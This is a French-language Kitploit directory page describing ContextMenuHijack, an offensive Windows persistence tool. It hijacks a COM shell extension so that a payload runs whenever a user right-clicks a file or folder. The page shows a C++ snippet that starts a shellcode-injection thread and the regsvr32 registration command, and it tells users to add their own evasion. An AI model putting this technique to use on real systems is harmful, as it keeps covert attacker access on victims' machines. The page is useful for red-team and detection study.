Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ContextMenuHijack — Exécuter un payload à chaque clic droit sur un fichier/dossier dans le menu de l'explorateur pour la persistance | Kitploit
Outils/GitHubGitHub/ristbs/contextmenuhijack
Mécanismes de PersistancePost-ExploitationRed TeamingDéveloppement de Charges Utiles
GitHubristbs/contextmenuhijack

ContextMenuHijack

Exécuter un payload à chaque clic droit sur un fichier/dossier dans le menu de l'explorateur pour la persistance

Voir le dépôt
173274il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ContextMenuHijack

Cette idée originale qui m'a inspiré vient de @NinjaParanoid :

Video

ContextMenuHijack est une technique de persistance simple qui utilise le détournement COM basé sur le comportement humain : lorsque vous faites un clic droit sur un fichier/dossier dans l'Explorateur de fichiers pour ouvrir le menu contextuel, il exécute en même temps le beacon que nous avons spécifié.

root@kitploit:~
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
    DWORD tid = NULL;
    CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);

    if (NULL == pDataObj) {
	if (pidlFolder != NULL) {
	}
        return S_OK;
    }
    return S_OK;
}

Utilisation

Il vous suffit de charger le fichier solution (.sln) et de le compiler. Il est important de savoir que vous avez besoin de privilèges d'administrateur pour utiliser cette technique de persistance. Une fois que vous avez fait tout cela, il vous suffit d'enregistrer le fichier DLL dans le registre avec regsvr32 :

root@kitploit:~
regsvr32 "C:\path\to\ContextMenuHijack.dll"

si vous voulez le désinstaller, utilisez simplement le flag /u

root@kitploit:~
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

persistence1

  • cette technique peut être facilement détectée à partir de la pile de threads de explorer.exe, c'est à vous d'utiliser vos propres techniques d'évasion image

Crédits

  • https://github.com/rikka0w0/ExplorerContextMenuTweaker
  • https://learn.microsoft.com/en-us/windows/win32/shell/how-to-implement-the-icontextmenu-interface?redirectedfrom=MSDN
  • https://www.codeproject.com/Articles/441/The-Complete-Idiot-s-Guide-to-Writing-Shell-Extens
Télécharger l’outil